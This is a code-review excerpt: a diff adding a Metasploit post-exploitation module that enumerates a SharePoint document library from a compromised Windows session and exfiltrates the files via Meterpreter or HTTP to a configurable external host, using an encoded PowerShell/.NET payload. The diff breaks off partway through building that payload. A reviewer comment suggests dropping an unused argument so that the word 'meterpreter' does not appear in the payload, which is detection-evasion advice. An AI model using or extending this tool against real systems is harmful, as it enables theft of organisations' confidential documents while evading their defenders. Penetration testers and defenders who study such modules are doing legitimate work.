modules/post/windows/gather/sharepoint_document_extractor.rb

```diff
@@ -0,0 +1,222 @@
+    register_module_options
+  end
+
+  def metadata
+    {
+      'Name' => name,
+      'Description' => description,
+      'Author' => ['Vikram Verma'],
+      'License' => MSF_LICENSE,
+      'Platform' => 'win',
+      'Arch' => [ARCH_X86, ARCH_X64], 
+      'Notes' => notes
+    }
+  end
+
+  def name
+    'SharePoint Document Library Enumerator and Extractor'
+  end
+
+  def description
+    <<~DESC
+      Enumerates and extracts documents from a specified SharePoint library using the
+      SharePoint .NET API. Designed to run in an existing Windows session (e.g., Meterpreter)
+      on a SharePoint server. Supports exfiltration via HTTP or Meterpreter channels,
+      with configurable filters for file size and library targeting. Requires execution
+      in a context with access to SharePoint assemblies and appropriate permissions.
+    DESC
+  end
+
+  def notes
+    {
+      'Stability' => ['crash-safe'],
+      'Reliability' => ['repeatable-session'],
+      'SideEffects' => ['network-traffic']
+    }
+  end
+
+  def register_module_options
+    register_options(build_options)
+  end
+
+  def build_options
+    [
+      OptString.new('SITE_URL', [true, 'Full URL of the SharePoint site', 'http://sharepoint.local']),
+      OptString.new('LIBRARY', [true, 'Target document library name', 'Documents']),
+      OptEnum.new('EXFIL_METHOD',
+                  [true, 'Exfiltration method (HTTP or METERPRETER)', 'METERPRETER', %w[HTTP METERPRETER]]),
+      OptString.new('EXFIL_HOST', [false, 'Host for HTTP exfiltration', '']),
+      OptInt.new('EXFIL_PORT', [false, 'Port for HTTP exfiltration', 8080]),
+      OptInt.new('MAX_SIZE', [true, 'Max file size to exfiltrate (bytes)', 10_485_760]) # 10MB
+    ]
+  end
+
+  def check
+    return Exploit::CheckCode::Safe('Target is not a Windows system') unless session.platform == 'windows'
+
+    Exploit::CheckCode::Appears('Module ready to run on Windows session')
+  end
+
+  def run
+    fail_with(Failure::NotVulnerable, 'No active session available') unless session
+
+    handle_exfiltration_config
+    execute_payload
+  end
+
+  def execute_payload
+    print_status('Generating SharePoint document extractor payload...')
+    encoded_cmd = encode_script(build_ps_payload) # Updated to use PowerShell mixin API
+    print_status("Executing payload on target session #{session.sid}...")
+    output = execute_script(encoded_cmd)
+    process_output(output) if output
+    print_status('Check session output manually for results.') unless session.type == 'meterpreter'
+  end
+
+  def build_ps_payload
+    <<~PS
+      try {
+        Add-Type -TypeDefinition @"
+        #{build_dotnet_code}
+        "@ -ReferencedAssemblies "Microsoft.SharePoint.dll","System.Web.dll" -ErrorAction Stop
+        [SharePointExtractor]::ExtractDocs('#{datastore['SITE_URL']}', '#{datastore['LIBRARY']}',
+          '#{datastore['EXFIL_METHOD']}', '#{datastore['EXFIL_HOST']}', #{datastore['EXFIL_PORT']},
```

Comment:
The `EXFIL_METHOD` seems to be passed as an argument in Powershell but then never used. It should be removed, if for no other reason then to ensure that the word meterpreter is not included in the payload.